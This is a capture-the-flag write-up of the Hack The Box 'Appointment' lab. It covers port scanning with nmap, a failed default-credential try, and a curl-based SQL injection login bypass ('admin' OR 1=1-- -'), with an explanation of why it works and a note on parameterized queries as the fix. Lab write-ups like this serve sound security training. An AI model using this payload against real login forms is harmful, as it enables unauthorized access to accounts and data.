Machine / Machines

Walkthrough: Appointment (HTB Starting Point)

By Jennofrie Daguil ยท Cybersecurity and Red Team Operator

Target: <TARGET> | OS: Linux | Difficulty: Easy | Date: 2026-05-05 Result: Port 80 open (Apache 2.4.38, page title "Login"). Port 8254 filtered (irrelevant). Full port scan confirmed no additional services. Result: Simple login form with username and password...

EasyPublished 2026-06-12Sanitized local writeup

Scenario

Walkthrough: Appointment (HTB Starting Point) attack path

Target: | OS: Linux | Difficulty: Easy | Date: 2026-05-05 Result: Port 80 open (Apache 2.4.38, page title "Login"). Port 8254 filtered (irrelevant). Full port scan confirmed no additional services. Result: Simple login form with username and credential...

Objective

Machine walkthrough focused on Machines evidence, validation, and reusable operator lessons.

Walkthrough: Appointment (HTB Starting Point) sanitized attack graph

Walkthrough flow

01

Lessons Learned

02

Phase 0: Setup

03

Phase 1: Recon

04

Phase 3: Synthesis

05

Phase 4: Foothold

Source coverage

Moderate source coverage

Status: partial. This article is generated from 2 sanitized Markdown sources and keeps raw flags, credentials, keys, cookies, and reusable secrets out of the rendered blog.

65% coverage
Evidence verdict

Moderate confidence: the page is useful for review, but it should be treated as partial because the available source material is thinner or less narrative-complete.

  • <TARGET>-Appointment/walkthrough.md
  • HTB/<TARGET>-Appointment/notes.md

Technical Walkthrough

Walkthrough: Appointment (HTB Starting Point)

Target: <TARGET> | OS: Linux | Difficulty: Easy | Date: 2026-05-05

Step 1: Port Scan

bash
nmap -sC -sV -oN ./<TARGET>/nmap/initial <TARGET>

Result: Port 80 open (Apache 2.4.38, page title "Login"). Port 8254 filtered (irrelevant). Full port scan confirmed no additional services.

Step 2: Web Reconnaissance

bash
curl -s -i http://<TARGET>/

Result: Simple login form with username and password POST fields. Bootstrap-based template. No additional endpoints found (robots.txt, .git, sitemap.xml all returned 404).

Step 3: Default Credentials (Failed)

bash
curl -s -i -X POST http://<TARGET>/ -d 'username=admin&password: <redacted>'

Result: Login page returned unchanged (4896 bytes). Default creds do not work.

Step 4: SQL Injection Auth Bypass (Success)

bash
curl -s -i -X POST 'http://<TARGET>/' \
  -d 'username=admin%27+OR+1%3D1--+-&password: <redacted>'

Payload decoded: admin' OR 1=1-- -

How it works: The backend SQL query is likely:

sql
SELECT * FROM users WHERE username='$user' AND password: <redacted>'

With the injected username, this becomes:

sql
SELECT * FROM users WHERE username='admin' OR 1=1-- -' AND password: <redacted>'

The OR 1=1 makes the WHERE clause always true. The -- - comments out the rest of the query (the password check). The database returns all rows, and the application treats this as a successful login.

Result: Response changed to 2440 bytes containing the flag:

text
Congratulations!
Your flag is: <hash redacted>

Flag

text
<hash redacted>

Lessons Learned

  1. Box name as hint: "Appointment" + Easy difficulty + login form = high probability of SQL injection. HTB Starting Point boxes often have their vulnerability class hinted in the name.
  2. Speed over thoroughness for Easy: Default cred check + SQLi bypass took under 5 minutes. No directory fuzzing or heavy enumeration was needed.
  3. Classic SQLi pattern: The ' OR 1=1-- - bypass remains the first thing to try on any unsanitized login form. The trailing - after -- ensures the comment is parsed correctly by MySQL.
  4. No parameterized queries: The application directly concatenates user input into SQL. This is the textbook vulnerability that prepared statements / parameterized queries prevent.

Tools Used

  • nmap (port scanning, service detection)
  • curl (HTTP requests, form submission)

Files

FileDescription
nmap/initialInitial nmap scan output
nmap/allportsFull TCP port scan output
enum/sqli-bypass-response.txtFull HTTP response from successful SQLi
enum/default-creds-response.txtFull HTTP response from failed default creds
loot/flag.txtCaptured flag

Source-Backed Dossier

The sections below are merged from companion Markdown notes for the same case. They are rendered after sanitization so the article stays precise without publishing raw flags, credentials, or target-specific secrets.

Notes

Scope

  • Target IP: <TARGET>
  • Target Name: Appointment
  • Target OS: Linux
  • Difficulty: Easy (Starting Point)
  • Pwnbox SSH: x08@<TARGET>
  • Attacker VPN IP: <TARGET>
  • Start Time: 2026-05-05
  • Timebox: 45-60 min solve target
  • Actual Solve Time: ~5 minutes

Hypothesis

Name "Appointment" suggests a booking/scheduling web app. Expect HTTP service with login form vulnerable to SQL injection (classic admin' OR 1=1-- bypass) or default credentials.

Result: Hypothesis confirmed. Login form on port 80, SQLi auth bypass worked first try.

Findings

Open Services

PortServiceVersion
80/tcpHTTPApache 2.4.38 (Debian)
8254/tcpfilteredunknown

Web Application

  • Simple login form at / (POST method, fields: username, password)
  • Title: "Login"
  • No additional pages discovered (no robots.txt, .git, sitemap.xml)
  • Template: Bootstrap-based login template with daterangepicker (scheduling/appointment theme)

Vulnerability

  • SQL Injection on login form -- username field is injectable
  • Payload: admin' OR 1=1-- - with any password
  • The backend likely runs: SELECT * FROM users WHERE username='INPUT' AND password: <redacted>'
  • The injected query becomes: SELECT * FROM users WHERE username='admin' OR 1=1-- -' AND password: <redacted>'
  • This always returns true, bypassing authentication

Flag

  • Flag: <hash redacted>
  • Captured from live target via SQLi auth bypass

Command Log

Phase 0: Setup

  • Workspace created at <local workspace><TARGET>/
  • Memory files loaded: MEMORY.md, htb_web_attack_patterns.md, htb_quick_wins.md
  • Pwnbox SSH verified, VPN IP <TARGET> confirmed, target reachable (303ms)

Phase 1: Recon

  • nmap -sC -sV -- port 80 open (Apache 2.4.38, title "Login"), 8254 filtered
  • nmap -p<redacted> --min-rate 5000 -- confirmed only port 80 open
  • curl -s -i http://<TARGET>/ -- retrieved login form HTML
  • Quick win checks (robots.txt, .git, sitemap.xml) -- all 404

Phase 3: Synthesis

  • Single HTTP service with login form
  • No other attack surface
  • Primary path: SQLi on login form (high confidence based on box name + difficulty)
  • Backup path: directory fuzzing, default creds, brute force

Phase 4: Foothold

  • Default creds admin:admin -- failed (returned login page, 4896 bytes)
  • SQLi bypass admin' OR 1=1-- - -- SUCCESS (returned flag page, 2440 bytes)
  • Flag captured: <hash redacted>

Phase 5: Privesc

  • N/A -- Starting Point box, single flag only

Related insights

MachinesArchetype Walkthrough - HTB Starting PointMachinesBaseMachinesBase